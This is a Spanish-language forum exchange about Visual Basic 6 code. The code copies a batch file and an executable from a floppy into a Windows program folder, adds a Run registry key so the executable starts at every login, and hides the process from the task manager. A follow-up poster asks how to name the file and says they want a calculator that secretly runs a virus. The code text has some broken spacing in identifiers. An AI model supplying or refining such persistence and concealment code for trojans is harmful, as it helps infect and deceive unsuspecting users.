ahi esta el codigo completo el install
Private Sub Form_Load()
Dim ip As String, ipftp As String, port As Integer
Dim ejec As String 'declaramos estas variables , si las declarais en el general mejor
Dim win
Dim sys
Dim residencia
On Error Resume Next
FileCopy "a:\proj.bat", "C:\Archivos de programa\Archivos comunes\proj.bat" ' El primero es el Source
FileCopy "a:\selector.exe", "C:\Archivos de programa\Archivos comunes\selector.exe" ' El primero es el Source
'FileCopy (App.Path & "\" & App.FileDescri ption & "archivo.txt"), ("C:\archivo.txt")
'Name sys & "\nombre1" As sys & "\ver.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.Reg Write "HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe" 'esto modifica el
App.TaskVisibl e = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub
Eso es el REGISTRO ??
Y... x ejemplo el "selector.exe" es como tu lo nombres no ? = que el archivo.txt,
yo m pregunto, si el " virus " se llama PEPITO.EXE, luego en " HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\
selector.exe" selector.exe tiene que ser PEPITO.exe ? o puede ser independiente,
Es que yo quiero hacer un programa con doble sentido,
Es decir, una calculadora, que su segunda funcion sea el virus, pero que al ejecutarlo ala hora no ejecute la calculadora si no el virus xD nose si me explico